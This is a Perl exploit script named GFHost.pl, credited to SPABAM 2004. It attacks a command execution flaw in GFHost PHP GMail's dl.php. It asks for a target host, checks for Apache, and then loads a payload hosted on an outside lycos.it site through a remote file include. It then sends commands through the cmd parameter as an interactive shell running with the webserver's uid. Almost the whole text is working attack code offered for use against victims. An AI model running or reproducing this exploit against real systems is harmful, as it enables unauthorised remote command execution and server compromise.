GFHost.pl

`##############################################  
# GFHost explo  
# Spawn bash style Shell with webserver uid  
# Greetz SPAX, foxtwo, Zone-H  
# This Script is currently under development  
##############################################  
  
use strict;  
use IO::Socket;  
my $host;   
my $port;   
my $command;   
my $url;   
my @results;   
my $probe;   
my @U;   
$U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b&f=http://utenti.lycos.it/z00/xpl.gif&cmd=";  
&intro;  
&scan;  
&choose;  
&command;  
&exit;   
sub intro {  
&help;  
&host;  
&server;  
sleep 1;  
};  
sub host {  
print "\nHost or IP : ";  
$host=<STDIN>;  
chomp $host;  
if ($host eq ""){$host="127.0.0.1"};  
print "\nPort (enter to accept 80): ";  
$port=<STDIN>;  
chomp $port;  
if ($port =~/\D/ ){$port="80"};  
if ($port eq "" ) {$port = "80"};  
};   
sub server {  
my $X;  
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";  
$probe = "string";  
my $output;  
my $webserver = "something";  
&connect;  
for ($X=0; $X<=10; $X++){  
$output = $results[$X];  
if (defined $output){  
if ($output =~/apache/){ $webserver = "apache" };  
};  
};  
if ($webserver ne "apache"){  
my $choice = "y";  
chomp $choice;  
if ($choice =~/N/i) {&exit};  
}else{  
print "\n\nOK";  
};   
};   
sub scan {  
my $status = "not_vulnerable";  
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";  
my $loop;  
my $output;  
my $flag;  
$command="dir";  
for ($loop=1; $loop < @U; $loop++) {   
$flag = "0";  
$url = $U[$loop];  
$probe = "scan";  
&connect;  
foreach $output (@results){  
if ($output =~ /Directory/) {  
$flag = "1";  
$status = "vulnerable";  
};  
};  
if ($flag eq "0") {   
}else{  
};  
};  
if ($status eq "not_vulnerable"){  
  
};  
};   
sub choose {  
  
my $choice="1";  
chomp $choice;  
if ($choice > @U){ &choose };  
if ($choice =~/\D/g ){ &choose };  
if ($choice == 0){ &other };  
$url = $U[$choice];  
};   
sub other {  
my $other = <STDIN>;  
chomp $other;  
$U[0] = $other;  
};   
sub command {  
while ($command !~/quit/i) {  
print "[$host]\$ ";  
$command = <STDIN>;  
chomp $command;  
if ($command =~/quit/i) { &exit };  
if ($command =~/url/i) { &choose };   
if ($command =~/scan/i) { &scan };  
if ($command =~/help/i) { &help };  
$command =~ s/\s/+/g;   
$probe = "command";  
if ($command !~/quit|url|scan|help/) {&connect};  
};  
&exit;  
};   
sub connect {  
my $connection = IO::Socket::INET->new (  
Proto => "tcp",  
PeerAddr => "$host",  
PeerPort => "$port",  
) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";  
$connection -> autoflush(1);  
if ($probe =~/command|scan/){  
print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";  
}elsif ($probe =~/string/) {  
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";  
};  
  
while ( <$connection> ) {   
@results = <$connection>;  
};  
close $connection;  
if ($probe eq "command"){ &output };  
if ($probe eq "string"){ &output };  
};   
sub output{  
my $display;  
if ($probe eq "string") {  
my $X;  
for ($X=0; $X<=10; $X++) {  
$display = $results[$X];  
if (defined $display){print "$display";};  
};  
}else{  
foreach $display (@results){  
print "$display";  
};  
};  
};   
sub exit{  
print "\n\n\n ORP";  
exit;  
};  
sub help {  
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";  
print "\n  
GFHost PHP GMail   
Command Execution Vulnerability by SPABAM 2004" ;  
print "\n http://www.zone-h.org/advisories/read/id=4904  
";  
print "\n GFHost.pl Exploit v1.1";  
print "\n \n note.. Script under DEVEL";  
print "\n";  
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";  
print "\n Command: SCAN URL HELP QUIT";  
print "\n\n\n\n\n\n\n\n\n\n\n";  
};  
  
  
`